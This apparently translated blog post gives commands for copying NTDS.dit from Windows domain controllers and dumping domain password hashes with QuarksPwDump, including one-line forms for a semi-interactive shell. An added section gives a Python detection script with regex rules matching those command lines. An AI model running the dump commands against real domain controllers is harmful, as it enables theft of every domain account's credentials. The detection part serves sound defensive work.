How to export domain controller hashes on Windows 2003, Windows 2008 and Windows 2012

Posted 懒惰不懒


Usage as described by the quarkspwdump author:

1. Windows 2008
   
  Microsoft recently implemented VSS (Volume Shadow Copy Service), which allows an administrator to make
  filesystem snapshots while the operating system is running and writing to current backed-up files.
   
  Here is a way to backup NTDS.dit file while a domain controller is running:
   
  #ntdsutil
  #snapshot
  #activate instance ntds
  #create
  #mount {GUID}
  #copy c:\MOUNT_POINT\WINDOWS\NTDS\NTDS.dit c:\NTDS_saved.dit
  #unmount {GUID}
  #quit
  #quit
   
  If AD server hasn't the "AD DS role", you have to use dsdbutil.exe command in the same way.
   
   
   
 2. Windows 2003  
  On this version, VSS has been implemented but not NTDS-type snapshots.
  But you can use ntbackup tool, here is the procedure:
   
  - Launch NTBACKUP gui
  - Use backup wizard (advanced)
  - Choose to save system state only and choose output filename
  - Wait some minutes
  - Use restore wizard (advanced)
  - Choose your backup, click next and use advanced button
  - Choose to restore file on another location (c:\tmp\ for example)
  - Choose to overwrite everything and next uncheck all restoration parameters
  - Validate and wait some minutes
  - Open a command shell to "c:\tmp\Active Directory"
  - We need to repair the database with this command
  #esentutl /p ntds.dit
  - Validate warning and wait some minutes
   
  ntds.dit file can now be used with quarkspwdump.

 

Of these, the sequence

#ntdsutil
#snapshot
#activate instance ntds
#create
#mount {GUID}
#copy c:\MOUNT_POINT\WINDOWS\NTDS\NTDS.dit c:\NTDS_saved.dit
#unmount {GUID}
#quit
#quit

is suitable when you have an interactive session or are logged on directly.

In a semi-interactive session, the following approach can be used (usage seen online):

ntdsutil  snapshot  "activate  instance  ntds"  create  quit  quit
ntdsutil  snapshot  "mount {GUID}"  quit  quit
copy  MOUNT_POINT\windows\NTDS\ntds.dit  c:\ntds.dit
ntdsutil  snapshot  "unmount {GUID}"  quit  quit
ntdsutil  snapshot  "delete {GUID}"  quit  quit

 

Finally:

QuarksPwDump.exe --dump-hash-domain --ntds-file c:\ntds.dit
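
From the monitoring side, the commands above leave recognizable process command lines. The following is an added example, not part of the original post or the quarkspwdump author's text: a small matcher run over constructed process-creation events, which also shows that the interactive form logs only the bare tool name while the one-line form logs every subcommand. The rule names, event field names and host names are hypothetical, and the rules go slightly beyond the page by also covering dsdbutil, xcopy and robocopy.

```python
import re

# (rule, severity, pattern) matched against a process-creation command line.
# Case-insensitive; tolerant of the extra spacing in the one-line form.
RULES = [
    ("ntds_snapshot_oneliner", "high",
     re.compile(r'\b(ntdsutil|dsdbutil)(\.exe)?\b.*\bsnapshot\b', re.I)),
    # Interactive use: subcommands are typed at the prompt, so only the bare
    # tool name is logged. Lower confidence, worth correlating on a DC.
    ("ntds_tool_interactive", "medium",
     re.compile(r'^\s*"?([a-z]:\\[^"]*\\)?(ntdsutil|dsdbutil)(\.exe)?"?\s*$', re.I)),
    ("ntds_dit_repair", "high",
     re.compile(r'\besentutl(\.exe)?\b.*\s/p\b.*ntds\.dit', re.I)),
    ("ntds_dit_copy", "high",
     re.compile(r'\b(copy|xcopy|robocopy)\b.*ntds\.dit', re.I)),
    ("offline_hash_dump", "high",
     re.compile(r'--dump-hash-domain\b|--ntds-file\b', re.I)),
]

def classify(command_line):
    """Return [(rule, severity)] for every rule the command line matches."""
    return [(name, sev) for name, sev, rx in RULES if rx.search(command_line)]

def scan(events):
    """Return [(host, rule, severity)] for all matching events, in order."""
    return [(ev["host"], name, sev)
            for ev in events
            for name, sev in classify(ev["command_line"])]

# Constructed sample events; host names and field names are hypothetical.
SAMPLE_EVENTS = [
    {"host": "DC01", "command_line":
     'ntdsutil  snapshot  "activate  instance  ntds"  create  quit  quit'},
    {"host": "DC01", "command_line":
     r"cmd.exe /c copy MOUNT_POINT\windows\NTDS\ntds.dit c:\ntds.dit"},
    {"host": "DC02", "command_line": "ntdsutil"},
    {"host": "DC02", "command_line": "esentutl /p ntds.dit"},
    {"host": "WS07", "command_line":
     r"QuarksPwDump.exe --dump-hash-domain --ntds-file c:\ntds.dit"},
    {"host": "WS07", "command_line": r"esentutl /g c:\data\app.edb"},  # benign
    {"host": "WS07", "command_line": "ipconfig /all"},                 # benign
]

if __name__ == "__main__":
    for host, rule, sev in scan(SAMPLE_EVENTS):
        print(f"{sev:6} {host} {rule}")
```

Because copy is a cmd.exe built-in, the copy rule only fires when it is launched as an argument to cmd.exe; a copy typed into an already open shell creates no new process and has to be caught by file-access auditing on ntds.dit instead.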

 
